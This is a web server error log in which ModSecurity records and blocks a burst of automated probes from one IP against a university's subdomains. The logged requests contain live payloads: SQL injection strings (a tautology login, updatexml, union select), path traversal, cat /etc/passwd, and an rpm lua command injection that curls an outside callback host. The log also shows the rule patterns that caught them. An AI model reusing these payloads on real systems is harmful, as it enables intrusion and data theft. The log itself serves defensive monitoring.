[Tue Aug 29 11:34:39.408270 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11X8Co-f0AAATavuAAAAAg"]
[Tue Aug 29 11:34:40.326115 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgrcfgtjrdofrde.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11YMCo-f0AAAPDoPMAAAAP"]
[Tue Aug 29 11:34:41.324275 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAUFdekAAAA9"]
[Tue Aug 29 11:34:41.331976 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATxvX4AAAAw"]
[Tue Aug 29 11:34:41.335341 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAT2JPwAAAAz"]
[Tue Aug 29 11:34:41.374817 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATTmRcAAAAV"]
[Tue Aug 29 11:34:41.375078 2023] [:error] [pid 1252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATkXr4AAAAp"]
[Tue Aug 29 11:34:42.329314 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAUTiW8AAABJ"]
[Tue Aug 29 11:34:42.333663 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YsCo-f0AAAUZcE4AAABO"]
[Tue Aug 29 11:34:42.335752 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAASEJW0AAAAE"]
[Tue Aug 29 11:34:42.345113 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAPLwJIAAAAX"]
[Tue Aug 29 11:34:42.355396 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAATQXhAAAAAO"]
[Tue Aug 29 11:34:42.369097 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAASI0DsAAAAG"]
[Tue Aug 29 11:34:43.360114 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11Y8Co-f0AAATUxQcAAAAW"]
[Tue Aug 29 11:34:44.295746 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATTmRoAAAAV"]
[Tue Aug 29 11:34:44.301146 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUTiXEAAABJ"]
[Tue Aug 29 11:34:44.303886 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAASEJW4AAAAE"]
[Tue Aug 29 11:34:44.306190 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATmZc8AAAAr"]
[Tue Aug 29 11:34:44.308064 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATqf74AAAAu"]
[Tue Aug 29 11:34:44.339966 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUIz7UAAABA"]
[Tue Aug 29 11:34:49.297641 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAATmZdYAAAAr"]
[Tue Aug 29 11:34:49.302730 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAATZp6EAAAAf"]
[Tue Aug 29 11:34:49.308504 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUJIyEAAABB"]
[Tue Aug 29 11:34:49.309659 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAUQ7r8AAABH"]
[Tue Aug 29 11:34:49.312760 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAT@KvkAAAA2"]
[Tue Aug 29 11:34:49.314128 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAASEJXQAAAAE"]
[Tue Aug 29 11:34:49.315453 2023] [:error] [pid 1292] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAUMVNEAAABE"]
